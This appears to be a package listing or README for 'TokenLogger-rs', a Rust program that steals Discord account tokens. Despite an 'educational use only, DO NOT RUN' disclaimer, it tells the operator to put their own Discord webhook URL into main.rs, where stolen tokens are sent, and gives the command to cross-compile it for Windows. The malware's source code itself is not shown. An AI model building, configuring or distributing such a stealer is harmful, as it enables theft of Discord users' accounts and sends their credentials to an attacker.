token_logger 1.0.0

A discord token logger written in rust, DO NOT RUN, for educational use only
token_logger-1.0.0 is not a library.

TokenLogger-rs

A Discord Token Logger Written in Rust

On line 7 in main.rs (shown below) you must replace the variable with your webhook url

let url = "Discord Webhook URL";

To build just do

$ cargo build --target x86_64-pc-windows-gnu